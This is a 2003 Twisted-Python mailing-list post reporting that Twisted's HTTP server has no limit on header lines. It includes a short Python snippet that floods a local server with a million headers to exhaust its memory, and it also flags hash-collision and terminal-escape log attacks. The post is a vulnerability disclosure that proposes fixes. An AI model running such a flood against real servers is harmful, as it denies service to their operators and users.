[Twisted-Python] possible web server attacks

Andrew Dalke dalke at dalkescientific.com
Sun Jun 8 20:19:33 EDT 2003


There appears to be a trivial attack against the HTTP server.

The code doesn't restrict the number of header lines sent to the
server, so the following will do nasty things to it.

 >>> import socket
 >>> def go():
...  f=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
...  f.connect(("localhost", 8080))
...  f.send("GET / HTTP/1.0\r\n")
...  for i in range(1000000):
...   f.send("%s: X\r\n" % i)
...   if i%1000 == 0: print i
...
 >>> go()
  ....
 >>> go()
  ....

Keep going until the machine runs out of memory.  I didn't have
a machine I wanted to sacrifice for that, so I don't know if the
actual code will catch the MemoryError or not.  Even if not, an
attacker can bring the memory use right up to the limit, thus
preventing other actions from occuring.

There needs to be a limit to the total number of header lines read
(or, as with Apache, a limit to the total number of bytes read for
the header).

As was pointed out before when I brought this up, there is a limit
to the line size.  But that's not enough.

Also, this non-limit opens Twisted up to the hash collision attack
mentioned recently on python-dev.

BTW, I also note that Twisted passes non-ASCII characters to the log.
This can be used as an attack against some terminals.  Here's one
document describing the method

   http://www.digitaldefense.net/labs/papers/Termulation.txt

Twisted should do what Apache does and escape those characters.

					Andrew
					dalke at dalkescientific.com





More information about the Twisted-Python mailing list